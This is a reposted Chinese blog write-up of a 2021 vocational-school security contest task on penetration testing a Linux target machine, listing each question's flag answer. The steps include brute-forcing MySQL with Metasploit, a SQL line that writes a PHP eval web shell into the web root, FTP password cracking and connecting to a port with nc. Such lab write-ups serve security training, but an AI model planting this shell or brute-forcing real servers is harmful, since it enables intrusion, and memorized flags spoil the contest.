当前位置:首页 » 《关注互联网》 » 正文

2021年江苏省职业院校技能大赛中职网络信息安全赛项试卷_FogIslandBay的博客

3 人参与  2022年01月24日 12:00  分类 : 《关注互联网》  评论

点击全文阅读


任务五:Linux操作系统渗透测试

  • 通过渗透机Kali对靶机服务器进行系统服务及版本扫描渗透测试,并将该操作显示结果中21端口对应的服务版本信息字符串作为Flag值提交;(1分)
  • 通过渗透机Kali对靶机服务器进行渗透测试,将该场景/var/www目录中唯一一个后缀为.bmp文件的文件名称作为Flag值提交;(1分)
  • 通过渗透机Kali对靶机服务器进行渗透测试,将该场景/var/www目录中唯一一个后缀为.bmp的图片文件中的英文单词作为Flag值提交;(1分)
  • 通过渗透机Kali对靶机服务器进行渗透测试,将该场景/home/guest目录中唯一一个后缀为.pdf文件的文件名称作为Flag值提交;(1分)
  • 通过渗透机Kali对靶机服务器进行渗透测试,将该场景/home/guest目录中唯一一个后缀为.pdf文件的文件内容作为Flag值提交;(2分)
  • 通过渗透机Kali对靶机服务器进行渗透测试,将该场景/var/vsftpd目录中唯一一个后缀为.docx文件的文件名称作为Flag值提交;(1分)
  • 通过渗透机Kali对靶机服务器进行渗透测试,将该场景/var/vsftpd目录中唯一一个后缀为.docx文件的文件内容作为Flag值提交;(2分)
  • 通过渗透机Kali对靶机服务器进行渗透测试,将该场景/root目录中唯一一个后缀为.txt文件的文件名称作为Flag值提交;(1分)
  • 通过渗透机Kali对靶机服务器进行渗透测试,将该场景/root目录中唯一一个后缀为.txt文件的文件内容作为Flag值提交。(2分)

1.通过渗透机Kali Linux对靶机Linux进行系统服务及版本扫描渗透测试,并将该操作显示结果中21端口对应的服务版本信息字符串作为Flag值提交;

Flag:vsftpd 2.3.4

 2.通过渗透机Kali Linux对靶机Linux进行渗透测试,将该场景/var/www目录中唯一一个后缀为.bmp文件的文件名称作为Flag值提交;

使用msfconsole ,use auxiliary/scanner/mysql/mysql_login 使用这个模块去爆破用户密码

 

得到密码aababb

连接数据库写入一句话木马

 mysql -h 172.16.1.200 -u root -p

写入木马文件

select '<?php @eval($_POST["cmd"])?>' into outfile '/var/www/html/shell.php';

使用菜刀连接木马

找到kerqmhta

Flag:kerqmhta

 第三题:直接打开kerqmhta

Flag:generous

第四题:找pdf文件的文件名称作为flag提交

尝试遍历目录/home/guest

发现该目录中的文件无法读取。

遍历/etc/passwd

发现目录中的异常用户,尝试对用户进行ftp暴力枚举

分别破解出密码如下:

使用同样的步骤破解用户amercn416的密码

登录ftp,进行遍历

Flag:qfewbrtd

5.通过渗透机Kali Linux对靶机Linux进行渗透测试,将该场景/home/guest目录中唯一一个后缀为.pdf文件的文件内容作为Flag值提交;

使用以下命令下载pdf文件至本地:

复制到桌面,双击打开查看。

Flag:dskfgern

6.通过渗透机Kali Linux对靶机Linux进行渗透测试,将该场景/var/vsftpd目录中唯一一个后缀为.docx文件的文件名称作为Flag值提交;

使用amercn416用户登录到ftp服务器,下载文件

Flag:kewatrup

7.通过渗透机Kali Linux对靶机Linux进行渗透测试,将该场景/var/vsftpd目录中唯一一个后缀为.docx文件的文件内容作为Flag值提交;

将文件拷贝至/var/www/html目录下并开启Apache服务 

进入客户端windows 7下使用ie浏览器打开以下链接,将文件保存至桌面

使用写字板查看文件内容

Flag:fighmups

8.通过渗透机Kali Linux对靶机Linux进行渗透测试,将该场景/root目录中唯一一个后缀为.txt文件的文件名称作为Flag值提交;

使用如下命令扫描目标靶机

 发现可疑端口,尝试使用nc工具进行连接

 

遍历目录

Flag:deirepzs

9.通过渗透机Kali Linux对靶机Linux进行渗透测试,将该场景/root目录中唯一一个后缀为.txt文件的文件内容作为Flag值提交。

Flag:twcdafrq

环境:1721676697


点击全文阅读


本文链接:http://zhangshiyu.com/post/33790.html

靶机  渗透  文件  
<< 上一篇 下一篇 >>

  • 评论(0)
  • 赞助本站

◎欢迎参与讨论,请在这里发表您的看法、交流您的观点。

关于我们 | 我要投稿 | 免责申明

Copyright © 2020-2022 ZhangShiYu.com Rights Reserved.豫ICP备2022013469号-1